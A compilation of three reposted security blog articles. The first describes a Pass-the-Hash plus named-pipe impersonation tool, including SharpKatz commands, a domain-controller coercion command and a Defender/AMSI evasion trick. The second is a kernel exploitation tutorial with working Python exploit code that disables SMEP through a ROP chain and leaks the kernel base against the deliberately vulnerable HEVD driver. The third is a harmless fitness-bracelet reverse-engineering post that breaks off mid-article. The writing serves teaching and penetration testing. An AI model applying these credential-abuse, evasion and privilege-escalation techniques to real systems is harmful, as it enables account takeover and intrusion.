Named Pipe Pass-the-Hash

Named Pipe Pass-the-Hash

Original text by s3cur3th1ssh1t

This post will cover a little project I did last week and is about Named pipe Impersonation in combination with Pass-the-Hash (PTH) to execute binaries as another user. Both techniques used are not new and often used, the 

only
 thing I did here is combination and modification of existing tools. The current public tools all use PTH for network authentication only. The difference to this “new” technique is therefore, that you can also spawn a new shell or C2-Stager as the PTH user for local actions 
and
 network authentication
.


2.05.2021: Update

Unfortunately I learned, that my technique can only be used for local actions, but not for network authentication, as Impersonation Tokens are restricted to that.


Introduction — why another PTH tool?

I faced certain Offensive Security project situations in the past, where I already had the NTLM-Hash of a 

low privileged
 user account and needed a shell for that user on the current compromised system — but that was not possible with the current public tools. Imagine two more facts for a situation like that — the NTLM Hash could not be cracked and there is no process of the victim user to execute shellcode in it or to migrate into that process. This may sound like an absurd edge-case for some of you. I still experienced that multiple times. Not only in one engagement I spend a lot of time searching for the right tool/technique in that specific situation. Last week, @n00py1 tweeted exactly the question I had in mind in those projects:

So I thought: Other people in the field obviously have the same limitations in existing tools.

My personal goals for a tool/technique were:

  • Fully featured shell or C2-connection as the victim user-account
  • It must to able to also Impersonate 
    low privileged
     accounts — depending on engagement goals it might be needed to access a system with a specific user such as the CEO, HR-accounts, SAP-administrators or others
  • The tool has to be used on a fully compromised system without another for example linux box under control in the network, so that it can be used as C2-module for example

The Tweet above therefore inspired me, to again search for existing tools/techniques. There are plenty of tools for network authentication via Pass-the-Hash. Most of them have the primary goal of code execution on remote systems — which needs a privileged users Hash. Some of those are:

If we want to have access to an administrative account and a shell for that account, we can easily use the WMI, DCOM and WinRM PTH-tools, as commands are executed in the users context. The python tools could be executed over a SOCKS tunnel via C2 for example, the Powershell scripts work out-of-the-box locally. SMB PTH tools execute commands as 

nt-authority\system
, so user impersonation is not possible here. One of my personal goals was not fulfilled — the impersonation of 
low privileged
 accounts. So I had to search for more possibilities.

The best results for local PTH actions are in my opinion indeed Mimikatz’s 

sekurlsa::pth
 and Rubeus’s 
PTT
 features. I tested them again to start software via PTH or inject a Kerberos ticket into existing processes and realized, that they 
only
 provide network authentication for the PTH-user. Network authentication Only? Ok, I have to admit, in the most cases network authentication is enough. You can read/write the Active Directory via LDAP, access network shares via SMB, execute code on remote systems with a privileged user (SMB, WMI, DCOM, WinRM) and so on. But still — the 
edge case
 to start an application as the other user via Pass-the-Hash is not possible. I thought to myself, that it might be possible to modify one of those tools to archieve the specific goal of an interactive shell. To do that, I had to first dig into the code to understand it. Modifying Rubeus was no opion for me, because 
PTT
 uses a Kerberos ticket, which is as far as I know only used for network authentication. That won’t help us authenticating on the localhost for a shell. So I took a look at the Mimikatz feature in the next step.

Mimikatz’s sekurlsa::pth feature

This part will only give some background information to the 

sekurlsa::pth
 Mimikatz module. If you already know about it feel free to skip. Searching for 
sekurlsa::pth
 internals resulted in two good blog posts for me, which I recommend reading for a deeper look into the topic, as I will only explain the high-level process:

A really short high-level overview of the process is as follows:

  • MSV1_0 and Kerberos are Windows two Authentication providers, which handle authentication using provided credential material
  • The LSASS process on a Windows Operating System contains a structure with MSV1_0 and Kerberos credential material
  • Mimikatz 
    sekurlsa::pth
     creates a new process with a dummy password for the PTH user. The process is first created in the SUSPENDED state
  • Afterwards it creates a new MSV and Kerberos structure with the user provided NTLM hash and overwrites the original structure for the given user
  • The newly created process is RESUMED, so that the specified binary like for example 
    cmd.exe
     is executed

This part is copy & paste from the part II blog: Overwriting these structures does not change the security information or user information for the local user account. The credentials stored in LSASS are associated with the logon session used for network authentication and not for identifying the local user account associated with a process.


Those of you, who read my other blog posts know, that C/C++ is not my favorite language. Therefore I decided to work with @b4rtik’s SharpKatz code, which is a C# port of the in my opinion most important and most used Mimikatz functions. Normally, I don’t like blog posts explaining a topic with code. Don’t ask me why, but this time I did it myself here. The PTH module first creates a structure for the credential material called 

data
 from the class 
SEKURLSA_PTH_DATA
:

The NtlmHash of this new structure is filled with our given Hash:


                if (!string.IsNullOrEmpty(rc4))
                    ntlmHashbytes = Utility.StringToByteArray(rc4);

                if (!string.IsNullOrEmpty(ntlmHash))
                    ntlmHashbytes = Utility.StringToByteArray(ntlmHash);

                if (ntlmHashbytes.Length != Msv1.LM_NTLM_HASH_LENGTH)
                    throw new System.ArgumentException();

                data.NtlmHash = ntlmHashbytes;

A new process in the 

SUSPENDED
 state is opened. Note, that our PTH username is chosen with an empty password:


                    PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
                    if(CreateProcessWithLogonW(user, "", domain, @"C:\Windows\System32", binary, arguments, CreationFlags.CREATE_SUSPENDED, ref pi))

In the next step, the process is opened and the 

LogonID
 of the new process is copied into our credential material object, which is related to our PTH username.

Afterwards, the function 

Pth_luid
 is called. This function first searches for and afterwards overwrites the MSV1.0 and Kerberos credential material with our newly created structure:

If that resulted in success, the process is resumed via 

NtResumeProcess
.

Named Pipe Impersonation

Thinking about alternative ways for PTH user Impersonation I asked @EthicalChaos about my approach/ideas and the use-case. Brainstorming with you is always a pleasure, thanks for that! Some ideas for the use-case were:

  • NTLM challenge response locally via InitializeSecurityContext / AcceptSecurityContext
  • Impersonation via process token
  • Impersonation via named pipe identity
  • Impersonation via RPC Identity

I excluded the first one, because I simply had no idea about that and never worked with it before. Impersonation via process token or RPC Identity required an existing process for the target user to steal the token from. A process for the target user doesn’t exist in my szenario, so only Named Pipe Impersonation was left. And I thought cool, I already worked with that to build a script to get a 

SYSTEM
 shell — NamedPipeSystem.ps1. So I’m not completely lost in the topic and know what it is about.

For everyone out there, who doesn’t know about Named Pipe Impersonation I can recommend the following blog post by @decoder_it:

Again, I will give a short high-level overview for it. Named Pipes are ment to be used for asynchronous or synchronous communication between processes. It’s possible to send or receive data via Named Pipes locally or over the network. Named Pipes on a Windows Operating System are accessible over the 

IPC$
 network share. One Windows API call, namely 
ImpersonateNamedPipeClient()
 allows the server to impersonate any client connecting to it. The 
only
 thing you need for that is the 
SeImpersonatePrivilege
 privilege. Local administrators and many service-accounts have this privilege by default. So opening up a Named Pipe with this privileges enables us to Impersonate any user connecting to that Pipe via 
ImpersonateNamedPipeClient()
 and open a new process with the token of that user-account.

My first thought about Named Pipe Impersonation in combination with PTH was, that I could spawn a new 

cmd.exe
 process via 
Mimikatz
 or 
SharpKatz
 Pass-the-Hash and connect to the Named Pipe over 
IPC$
 in the new process. If the network credentials are used for that, we would be able to fulfill all our goals for a new tool. So I opened up a new Powershell process via PTH and SharpKatz with the following command:


.\SharpKatz.exe --Command pth --User testing --Domain iPad --NtlmHash 7C53CFA5EA7D0F9B3B968AA0FB51A3F5 --Binary "\WindowsPowerShell\v1.0\powershell.exe"

What happens in the background? That is explained above. To test, that we are really using the credentials for the user 

testing
 we can connect to a linux boxes SMBServer:


smbserver.py -ip 192.168.126.131 -smb2support testshare /mnt/share

After opening up the server we can connect to it via simply echoing into the share:

And voila, the authentication as 

testing
 came in, so this definitely works:

@decoder_it’s wrote a Powershell script — pipeserverimpersonate.ps1 — which let’s us easily open up a Named Pipe Server for user Impersonation and to open 

cmd.exe
 afterwards with the token of the connecting user. The next step for me was to test, if connections from this new process connect to the Named Pipe Server with the network credentials. It turned out, that this unfortunately is not the case:

I tried to access the Pipe via 

127.0.0.1
Hostname
External IP
, but the same result in every case:

I also tried using a NamedPipeClient via Powershell — maybe this would result in network authentication with the user 

testing
 — still no success:

At this point I had no clue on how I could trigger network authentication to localhost for the Named Pipe access. So I gave up on Mimikatz and SharpKatz — but still learned something by doing that. And maybe some of you also learned something in this section. This was a dead end for me.

But what happens exactly when network authentication is triggered? To check that, I monitored the network interface for SMB access from one Windows System to another one:

  1. The TCP/IP Three-way-handshake is done (SYN,SYN/ACK,ACK)
  2. Two Negotiate Protocol Requests and Responses
  3. Session Setup Request, 
    NTLMSSP_NEGOTIATE
     + 
    NTLMSSP_AUTH
  4. Tree Connect Request to 
    IPC$
  5. Create Request File 
    testpipe

During my tool research I took a look at @kevin_robertson’s Invoke-SMBExec.ps1 code and found, that this script contains exactly the same packets and sends them manually. So by modifying this script, it could be possible to skip the Windows default behaviour and just send exactly those packets manually. This would simulate a remote system authenticating to our Pipe with the user 

testing
.

I went through the SMB documentation for some hours, but that did not help me much to be honest. But than I had the idea to just monitor the default 

Invoke-SMBExec.ps1
 traffic for the testing user. Here is the result:

Comparing those two packet captures results in only one very small difference. 

Invoke-SMBExec.ps1
 tries to access the Named Pipe 
svcctl
. We can easily change that in line 1562 and 2248 for the 
CreateRequest
 and 
CreateAndXRequest
 stage, by using different hex values for another Pipe name. So if we only change those bytes to the following, a 
CreateRequest
 request is send to our attacker controlled Named Pipe:


$SMB_named_pipe_bytes = 0x74,0x00,0x65,0x00,0x73,0x00,0x74,0x00,0x70,0x00,0x69,0x00,0x70,0x00,0x65,0x00 # \testpipe

The result is an local authentication to the Named Pipe as the user 

testing
:

To get rid of the error message and the resulting timeout we have to do some further changes to the 

Invoke-SMBExec
 code. I therefore modified the script, so that after the 
CreateRequest
 a 
CloseRequest
TreeDisconnect
 and 
Logoff
 packet is send instead of the default code execution stuff for Service creation and so on. I also removed all Inveigh Session stuff, parameters and so on.

But there still was one more thing to fix. I got the following error from 

cmd.exe
 when impersonating the user 
testing
 via network authentication:

This error didn’t pop up, when a 

cmd.exe
 was opened with the password, accessing the Pipe afterwards.

Googling this error results in many many crap answers ranging from 

corrupted filesystem, try to repair it
 to 
install DirectX 11
 or 
Disable Antivirus
. I decided to ask the community via Twitter and got a fast response from @tiraniddo, that the error code is likely due to not being able to open the Window Station. A solution for that is changing the 
WinSta/Desktop
 DACL to grant everyone access. I would have never figured this out, so thank you for that! 🙂 @decoder_it also send a link to RoguePotato, especially the code for setting correct WinSta/Desktop permissions is included there.

Modifying RoguePotato & building one script as PoC

Taking a look at the 

Desktop.cpp
 code from RoguePotato I decided pretty fast, that porting this code to Powershell or C# is no good idea for me as I would need way too much time for that. So my idea was, to modify the RoguePotato code to get a PipeServer which sets correct permissions for 
WinSta/Desktop
. Doing this was straight forward as I mostly had to remove code. So I removed the RogueOxidResolver components, the IStorageTrigger and so on. The result is the PipeServerImpersonate code.

Testing the server in combination with our modified Invoke-SMBExec script resulted in no shell at first. The 

CreateProcessAsUserW
 function did not open up the desired binary even though the token had 
SE_ASSIGN_PRIMARY_NAME
 privileges. I ended up using 
CreateProcessWithTokenW
 with 
CREATE_NEW_CONSOLE
 as dwCreationFlags, which worked perfectly fine. Opening up the Named Pipe via modified RoguePotato and connecting to it via Invoke-NamedPipePTH.ps1 resulted in successfull Pass-the-Hash to a Named Pipe for Impersonation and binary execution with the new token:

Still — this is not a perfect solution. Dropping PipeServerImpersonate to disk and executing the script in another session is one option, but a single script doing everything is much better in my opinion. Therefore I build a single script, which leverages Invoke-ReflectivePEInjection.ps1 to execute PipeServerImpersonate from memory. This is done in the background via 

Start-Job
, so that 
Invoke-NamedPipePTH
 can connect to the Pipe afterwards. It’s possible to specify a custom Pipe Name and binary for execution:

This enables us to use it from a C2-Server as module. You could also specify a C2-Stager as binary, so that you will get a new agent with the credentials of the PTH user.

Further ideas & improvements

I see my code still as PoC, because it is far away from being OPSEC safe and I didn’t test that much possible use-cases. Using Syscalls for PipeServerImpersonate and PE-Injection instead of Windows API functions would further improve this for example.

For those of you looking for a C# solution: Sharp-SMBExec is a C# port of 

Invoke-SMBExec
 which can be modified the same way I did here to get a C# version for the PTH to the Named Pipe part. However, the PipeServerImpersonate part should also be ported, which in my opinion is more work todo.


2.05.2021: Update

I also wrote a C# version based on this idea. It can be found here:

https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH

The whole project gave me the idea, that it would be really cool to also add an option to impacket’s 

ntlmrelayx.py
 to relay connections to a Named Pipe. Imagine you compromised a single host in a customer environment and this single host didn’t gave any valuable credentials but has 
SMB Signing disabled
. Modifying PipeServerImpersonate, so that the Named Pipe is not closed but re-opened again after executing a binary would make it possible to get a C2-Stager for every single incoming NetNTLMV2 connection. This means raining shells. The connections only need to be relayed to 
\\targetserver\IPC$\pipename
 to get a shell or C2-connection.


2.05.2021: Update

This idea was nice with the background thought, that we have local 

and
 network authentication for the new process. But we can only do stuff locally with an Impersonation token. This is also explained in the next part. Therefore the raining shells would not help us to move anywhere.


Having @itm4n’s article about PrintSpoofer — https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/ — in mind, I also had the idea, if it’s possible to relay a Domain Controllers Computer-Account Hash to our Named Pipe via Spoolsample. This can be done with the MS-RPRN part of the https://github.com/leechristensen/SpoolSample/tree/master/MS-RPRN by using 

/
 instead of 
\
 for the target system like this:


MS-RPRN.exe \\DomainControllerFQDN \\OutCompromisedSystemFQDN/pipe/pipename

This works perfectly fine, and we therefore can get a shell as Domain Controller computer account:

Using TokenViewer gives us the possibility to see, which Token Type and Impersonation Level we have:

I learned after writing this post and fiddling around with the new impersonated users shells, that 

Impersonation Tokens
 are restricted to Operating System local actions only. Processes with this Token Type cannot access ressources in the network like LDAP, SMB, HTTP or whatever else. Therefore, our DC shell for example is useless.

Until someone finds a way to get an 

Delegation Token
 from a process with an 
Impersonation Token
 for example. If the impersonated user is logged on interactively, you can also create a sheduled task for that user and trigger it. This would for example result in network access for that newly created task.

Conclusion

This is the first time, that I created somehow a new technique. At least I didn’t see anyone else using a combination of PTH and Named Pipe Impersonation with the same goal. For me, this was a pretty exciting experience and I learned a lot again.

I hope, that you also learned something from that or at least can use the resulting tool in some engagements whenever you are stuck in a situation described above. The script/tool is released with this post, and feedback is as always very welcome!


20.04.2021: Update

I’m pretty sure, that I before publication of the tool tested the content of Start-Job Scriptblocks for AMSI scans/blocks. And it was not scanned neither blocked. After the publication, Microsoft obviously decided to activate this feature, because the standalone script didn’t work anymore with Defender enabled even after patching 

AMSI.dll
 in memory for the process:

Therefore, I decided to switch from the native 

Start-Job
 function to the 
Start-ThreadJob
 function, which again bypasses Defender because its executed in the same process:

If this description is true, 

Start-Job
 should have scanned and blocked scripts before because it’s another process. But here we stay in the same process, therefore a bypass works:


HEVD: kASLR + SMEP Bypass

HEVD: kASLR + SMEP Bypass

Original text by Andres Roldan

During the last posts, we’ve been dealing with exploitation in Windows Kernel space. We are using HackSys Extremely Vulnerable Driver or 

HEVD
 as the target which is composed of several vulnerabilities to let practitioners sharpen the Windows Kernel exploitation skills.

In the last post, we successfully created a DoS exploit leveraging a stack overflow vulnerability in 

HEVD
. The DoS ocurred because we placed an arbitrary value on 
EIP
 (
41414141
) and when the OS tried to access that memory address, it was not accessible.

In this article, we will use that ability to overwrite 

EIP
 to execute code in privileged mode.

During the exploitation process, we will come across with Supervisor Mode Execution Prevention or 

SMEP
 which will thwart our exploit. But fear not: we will be able to bypass it.

Local vs Remote exploitation

When we were exploiting Vulnserver, we were doing remote exploitation to a user-space application. That kind of environment has certain specific restrictions, the most notorious are limited buffer space to insert our payload, character restrictions and 

ASLR
 (Address Space Layout Randomization).

When we are exploiting the Windows Kernel, it is assumed that we already have unprivileged local access to the target machine. In that environment, those restrictions are not longer a major issue. For example, the buffer space problem and character restrictions are easily circumvented by allocating dynamic memory with 

VirtualAlloc()
, moving the raw payload to that buffer and overwriting 
EIP
 with the returned pointer.

ASLR
 and 
kASLR
 (Kernel 
ASLR
) is not an issue either, because it works by randomizing the base memory of the modules at every restart, but if we have local access, there are functions in the Windows API that will reveal the current kernel base address.

However, other protections come to scene when trying to exploit at kernel level, like 

DEP
SMEP
CFG
, etc. We will surely come across with some of them later. Stay tuned.

Stack Overflow exploitation

We left off our previous article performing a DoS to the target machine, on where we used the following exploit:


<em>#!/usr/bin/env python3</em>
"""
HackSysExtremeVulnerableDrive Stack Overflow.

Vulnerable Software: HackSysExtremeVulnerableDrive
Version: 3.00
Exploit Author: Andres Roldan
Tested On: Windows 10 1703
Writeup: https://fluidattacks.com/blog/hevd-smep-bypass/
"""

from infi.wioctl import DeviceIoControl

DEVICE_NAME = r'\\.\HackSysExtremeVulnerableDriver'

IOCTL_HEVD_STACK_OVERFLOW = 0x222003
SIZE = 3000

PAYLOAD = (
    b'A' * SIZE
)

HANDLE = DeviceIoControl(DEVICE_NAME)
HANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)

And we were able to overwrite 

EIP
 with the value 
41414141
. If we are going to perform something more interesting, we must start by locating the exact offset on which 
EIP
 is overwritten. Just like on any other user-space exploitation process, we can create a cyclic pattern to find that offset. We can use 
mona
 to do that:

Mona Cyclic Pattern

Then, update our exploit:


<em>#!/usr/bin/env python3</em>
"""
HackSysExtremeVulnerableDrive Stack Overflow.

Vulnerable Software: HackSysExtremeVulnerableDrive
Version: 3.00
Exploit Author: Andres Roldan
Tested On: Windows 10 1703
Writeup: https://fluidattacks.com/blog/hevd-smep-bypass/
"""

from infi.wioctl import DeviceIoControl

DEVICE_NAME = r'\\.\HackSysExtremeVulnerableDriver'

IOCTL_HEVD_STACK_OVERFLOW = 0x222003

PAYLOAD = (
    b'&lt;insert pattern here&gt;'
)

SIZE = len(PAYLOAD)

HANDLE = DeviceIoControl(DEVICE_NAME)
HANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)

And check it:

Mona Cyclic Pattern

Good, 

mona
 discovered that EIP gets overwritten starting at byte 
2080
.

Now, for illustration purposes, we’ll create a simple shellcode to make 

EAX = 0xdeadbeef
. Then, we must copy it in a dynamic generated location created by 
VirtualAlloc()
. The return value of 
VirtualAlloc()
 is a pointer that will be placed starting at byte 2081 of our buffer to divert the execution flow to our shellcode.

Let’s update our exploit with that:


<em>#!/usr/bin/env python3</em>
"""
HackSysExtremeVulnerableDrive Stack Overflow.

Vulnerable Software: HackSysExtremeVulnerableDrive
Version: 3.00
Exploit Author: Andres Roldan
Tested On: Windows 10 1703
Writeup: https://fluidattacks.com/blog/hevd-smep-bypass/
"""

import struct
from ctypes import windll, c_int
from infi.wioctl import DeviceIoControl

KERNEL32 = windll.kernel32
DEVICE_NAME = r'\\.\HackSysExtremeVulnerableDriver'
IOCTL_HEVD_STACK_OVERFLOW = 0x222003

SHELLCODE = (
    b'\xb8\xef\xbe\xad\xde' +     <em># mov eax,0xdeadbeef</em>
    b'\xcc'                       <em># INT3 -&gt; software breakpoint</em>
)

RET_PTR = KERNEL32.VirtualAlloc(
    c_int(0),                    <em># lpAddress</em>
    c_int(len(SHELLCODE)),       <em># dwSize</em>
    c_int(0x3000),               <em># flAllocationType = MEM_COMMIT | MEM_RESERVE</em>
    c_int(0x40)                  <em># flProtect = PAGE_EXECUTE_READWRITE</em>
)

KERNEL32.RtlMoveMemory(
    c_int(RET_PTR),              <em># Destination</em>
    SHELLCODE,                   <em># Source</em>
    c_int(len(SHELLCODE))        <em># Length</em>
)

PAYLOAD = (
    b'A' * 2080 +
    struct.pack('&lt;L', RET_PTR)
)

SIZE = len(PAYLOAD)

HANDLE = DeviceIoControl(DEVICE_NAME)
HANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)

If everything comes as expected, 

EAX
 will have the value 
0xdeadbeef
 and execution will pause at the inserted breakpoint 
\xcc
. Let’s check it:

SMEP in action

Ouch!

Our exploit was thwarted and the error 

ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY
 was triggered when the first instruction of our shellcode was trying to execute. That means that 
SMEP
 did protect the kernel.

SMEP: Supervisor Mode Execution Prevention

There’s a concept called Protection rings which is used by operating systems to delimit capabilities and provide fault tolerance, by defining levels of privileges. Windows OS versions uses only 2 Current Privilege Levels (

CPL
): 0 and 3. 
CPL
 levels are also referred as 
rings
CPL0
 or 
ring-0
 is where the kernel is executed and 
CPL3
 or 
ring-3
 is where user mode instructions are performed.

SMEP
 is a protection introduced at CPU-level which prevents the kernel to execute code belonging to 
ring-3
.

The 

ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY
 exception was triggered because 
HEVD
 is executing at 
ring-0
 and after overwriting 
EIP
, it was trying to run the instructions in our shellcode which was allocated at 
ring-3
.

Technically, 

SMEP
 is nothing but a bit in a CPU control register, specifically the 20th bit of the 
CR4
 control register:

CR4 register

To bypass 

SMEP
, we must flip that bit (make it 
0
). As can be seen, the current value of 
CR4
 with 
SMEP
 enabled is 
001406e9
. Let’s check what would be the value after flipping the 20th bit:

CR4 register

It would be 

000406e9
. We need to place that value on 
CR4
 to turn off 
SMEP
.

But, how can we do that if we are not allowed to execute instructions at 

ring-3
ROP comes to the rescue! We need to execute a 
ROP
 chain with instructions that are already in kernel mode. At 
ring-0
 
ROP
 is often referred as 
kROP
. We then need to execute a 
kROP
 chain and change the value of 
CR4
. With that, we should be able to make 
EAX = 0xdeadbeef
.

In 

nt!KeFlushCurrentTb
, we find a gadget that sets 
CR4
 from whatever value 
EAX
 may have: 
mov cr4, eax # ret

CR4 ROP

Now, we need to calculate the offset of that 

ROP
 gadget from the start of the 
nt
 module:

CR4 ROP Offset

The offset is 

0011f8de
. We’ll use that later.

Now we need to find a 

pop eax # ret
 gadget. We can find one at 
nt!_MapCMDevicePropertyToNtProperty+0x39
:

POP EAX ROP

And the offset from the start of the 

nt
 module is 
0002bbef
:

POP EAX Offset

We must remember to pad our 

ROP
 chain with 8 bytes because the overflowed function epilog uses 
ret 8
 which will return to the value pointed by 
ESP
 and then will pop 8 bytes from the stack:

ROP Padding

With that, we can now disable 

SMEP
!

Defeating kASLR

We’ve got all the required information to create the 

ROP
 chain to disable 
SMEP
. However, we need to deal with kernel 
ASLR
. As I mentioned before, there are several functions that can be executed in user mode (
ring-3
) that can give information of addresses at 
ring-0
. The most used are 
NtQuerySystemInformation()
 and 
EnumDeviceDrivers()
. The later is the simpler. With the following code, you can get the kernel base address:


import sys
from ctypes import windll, c_ulong, byref, sizeof

PSAPI = windll.psapi

def get_kernel_base():
    """Obtain kernel base address."""
    buff_size = 0x4

    base = (c_ulong * buff_size)(0)

    if not PSAPI.EnumDeviceDrivers(base, sizeof(base), byref(c_ulong())):
        print('Failed to get kernel base address.')
        sys.exit(1)
    return base&#91;0]

BASE_ADDRESS = get_kernel_base()
print(f'Obtained kernel base address: {hex(BASE_ADDRESS)}')

And check it:

Kernel Base Address

As you can see, it matches perfectly to the address reported by 

WinDBG
:

Kernel Base Address

With that, we can update our exploit, adding the 

ROP
 chain to disable 
SMEP
, using the offsets of the gadgets and the value returned from that function to obtain absolute addresses, defeating 
kASLR
!


<em>#!/usr/bin/env python3</em>
"""
HackSysExtremeVulnerableDrive Stack Overflow.

Vulnerable Software: HackSysExtremeVulnerableDrive
Version: 3.00
Exploit Author: Andres Roldan
Tested On: Windows 10 1703
Writeup: https://fluidattacks.com/blog/hevd-smep-bypass/
"""

import struct
import sys
from ctypes import windll, c_int, c_ulong, byref, sizeof
from infi.wioctl import DeviceIoControl

KERNEL32 = windll.kernel32
PSAPI = windll.psapi
DEVICE_NAME = r'\\.\HackSysExtremeVulnerableDriver'
IOCTL_HEVD_STACK_OVERFLOW = 0x222003


def get_kernel_base():
    """Obtain kernel base address."""
    buff_size = 0x4

    base = (c_ulong * buff_size)(0)

    if not PSAPI.EnumDeviceDrivers(base, sizeof(base), byref(c_ulong())):
        print('Failed to get kernel base address.')
        sys.exit(1)
    return base&#91;0]


BASE_ADDRESS = get_kernel_base()
print(f'Obtained kernel base address: {hex(BASE_ADDRESS)}')

SHELLCODE = (
    b'\xb8\xef\xbe\xad\xde' +     <em># mov eax,0xdeadbeef</em>
    b'\xcc'                       <em># INT3 -&gt; software breakpoint</em>
)

RET_PTR = KERNEL32.VirtualAlloc(
    c_int(0),                    <em># lpAddress</em>
    c_int(len(SHELLCODE)),       <em># dwSize</em>
    c_int(0x3000),               <em># flAllocationType = MEM_COMMIT | MEM_RESERVE</em>
    c_int(0x40)                  <em># flProtect = PAGE_EXECUTE_READWRITE</em>
)

KERNEL32.RtlMoveMemory(
    c_int(RET_PTR),              <em># Destination</em>
    SHELLCODE,                   <em># Source</em>
    c_int(len(SHELLCODE))        <em># Length</em>
)

ROP_CHAIN = (
    struct.pack('&lt;L', BASE_ADDRESS + 0x0002bbef) +     <em>#  pop eax # ret</em>
    struct.pack('&lt;L', 0x42424242) +                    <em>#  Padding for ret 8</em>
    struct.pack('&lt;L', 0x42424242) +                    <em>#</em>
    struct.pack('&lt;L', 0x000406e9) +                    <em>#  Value to disable SMEP</em>
    struct.pack('&lt;L', BASE_ADDRESS + 0x0011f8de) +     <em>#  mov cr4, eax # ret</em>
    struct.pack('&lt;L', RET_PTR)                         <em>#  Pointer to shellcode</em>
)

PAYLOAD = (
    b'A' * 2080 +
    ROP_CHAIN
)

SIZE = len(PAYLOAD)

HANDLE = DeviceIoControl(DEVICE_NAME)
HANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)

Looks good. Now check it:

Success

And this is the content of the 

CR4
 register:

Success

As you can see, we were able to disable 

SMEP
 and made 
EAX = 0xdeadbeef
!

Conclusions

In this post we were able to execute a shellcode which made 

EAX = 0xdeadbeef
. We also bypassed 
SMEP
 protection using a 
kROP
 chain and defeated 
kASLR
 by leaking the kernel base address from 
ring-3
. However, we have still have to get a privileged shell on this system, which will be covered in the next article.

Reverse Engineering the M6 Smart Fitness Bracelet

Reverse Engineering the M6 Smart Fitness Bracelet

Original text by rbaron_

Following a year and a half of sitting inside the house, I set out to improve my wellbeing by getting a new fitness tracker. It worked out better than I expected — hacking on it kept me busy for a couple of months — at the small price of making me sitting inside the house even harder.

Before starting, I stated my goals as follows. I wanted to:

  1. Understand its hardware
  2. Figure out how to talk to it
  3. Dump its stock firmware
  4. Get it to run custom code, ideally making use of its:
    • GPIO pins (both for input and output)
    • Color display
    • Bluetooth low energy (BLE) capabilities

I documented the process of going through these goals in the following sections. It’s been an incredibly fun journey. I hope you enjoy it as much as I did.

The M6 Fitness Tracker Bracelet(s)

The particular bracelet we are talking about is the M6 from AliExpress (screenshot). I believe the name is an attempt to piggyback on the popularity of the $50, entry level Xiaomi Mi Smart Band 6 fitness tracker. At a $6 price point, our device is an even entrier level bracelet, and to put it politely, it draws a lot of inspiration from the Xiaomi one.Front of the boxFront of the M6 box

Hardware Overview

Disassembling the plastic case is so easy that it’s difficult to trust the IP67 water resistance rating claimed on the box.

Inside, we see some interesting stuff:

  • A Telink TLSR8232 system-on-a-chip (SoC)
  • A 0.96” (160×80 px) color display
  • A tiny ~100 mAh LiPo battery and USB charging circuit
  • A vibration motor
  • A (most likely) fake heart rate sensor

The Brains

Front of the PCBTop view of the printed circuit board

The SoC in the M6 is a Telink TLSR8232 (datasheet). Some specs:

  • 32-bit CPU
    • Closed architecture (usually referred to as tc32, similar to ARM9) — not a lot of resources about it
    • 24 MHz clock speed
  • 16kB of SRAM
  • 512kB of internal flash
  • 32kHz onboard oscillator for low power mode
  • SWS (Single Wire Slave) interface for debugging and programming
  • Integrated Bluetooth Low Energy (BLE) transceiver
  • Low power operation (alleged ~2 uA in deep sleep)

As luck would have it, just a few months ago I had seen a Telink chip in my little, hackable Xiaomi thermometer. At the point, I re-flashed it with @atc1441’s alternative firmware. Even though it’s a different SoC model, this gave me a little hope and a valuable starting point.

Exposed Pads

Front of the PCB (1/2)Bottom view of the printed circuit board (1/2)Back of the PCB (1/2)Bottom view of the printed circuit board (2/2)

Armed with nothing but a multimeter, a datasheet and good intentions, I tried to find where these pads are connected to. This is what I came up with:

PadSoC Pin #SoC Pin Label
SWS01SWS/ANA_C<7>
DAT06ANA_A<4>
TEST27ANA_C<1>
TX18ANA_B<4>
RX19ANA_B<5>

The Single Wire (aka. SWire or SWS) Interface

Now that we identified the brains of the bracelet, we turn to the goal of actually talking to it. If you programmed an ESP32 before, you probably relied on its bootloader and talked to it via UART. If you programmed or debugged an ARM microcontroller before, you probably used the SWD (serial wire debug) protocol.

In Telink-land, the analogous interface is called Single Wire or SWire. This is how apps are loaded into its flash memory, how it’s memory is read and written and how it’s debugged at runtime.

The real fun begins, though, when we try to learn more about this interface. The datasheet is almost comically quiet about it, as if pretending it doesn’t exist.

In the real world, where real programmers do real work, these chips are flashed and debugged with Telink’s official Burning and Debugging Tool. In the past, it seems hobbyists could get these devices very easily, but I couldn’t find them on the usual places in the beginning of the project. Now, as I write this post, it seems they recently became available on Mouser.

While the lack of specs and programmer set the stage up for a very unsatisfying dead end, this is, in fact, where things start to get interesting. The deep dive into the SWire specs and alternative tooling has been the most rewarding part of the project. Read on.

The Missing Specs

In what could be the nerdiest Indiana Jones spin-off yet, “the search for the missing SWire specs” brought me to the work of pvvx. Victor, in addition to maintaining a forked and low-power-optimized version of the alternative Xiaomi thermometer firmware from earlier, is a bona fide SWire ninja.

I struck gold when I came across one of his repositories, the TlsrTools. In there, there’s an excerpt of a PDF that contains a brief, two-page description of the SWire protocol. This seems to be a part of an old version of a Telink datasheet that has since been chopped off. That’s great news. We’re back in the game.

The Alternative Programmer

Victor also bootstrapped a whole new open source programmer for some Telink chips based on the beloved and ubiquitous STM32 Blue Pill board. This means that potentially both our roadblocks are removed — we have a (terse) SWire interface spec and a programmer.

At this point I start to really enjoy the process of demystifying SWire. It reminded me of the heartwarming story of when Paul McCartney and John Lennon got on a bus across Liverpool to meet a fellow they heard knew about the B7 chord. Now here I am, getting on the proverbial bus to meet this single fellow I heard knew about the SWire interface.

The bus takes me to interesting places. I can’t recognize the street signs, but the view looks amazing. I imported the STM32 code into my editor and translated some of its Russian comments.

This cross-language detective work gave me a relatively good understanding of the SWire protocol and of how to use Victor’s alternative programmer. There’s still a remaining pressing question, though. Victor’s programmer is made for TSLR826x chips, and we’ve got a TLSR8232 chip on our hands.

From Pascal to Python

There are usually three moving parts when programming/debugging a chip:

  1. The target board we want to program
  2. The programmer hardware
  3. The computer software that talks to the programmer

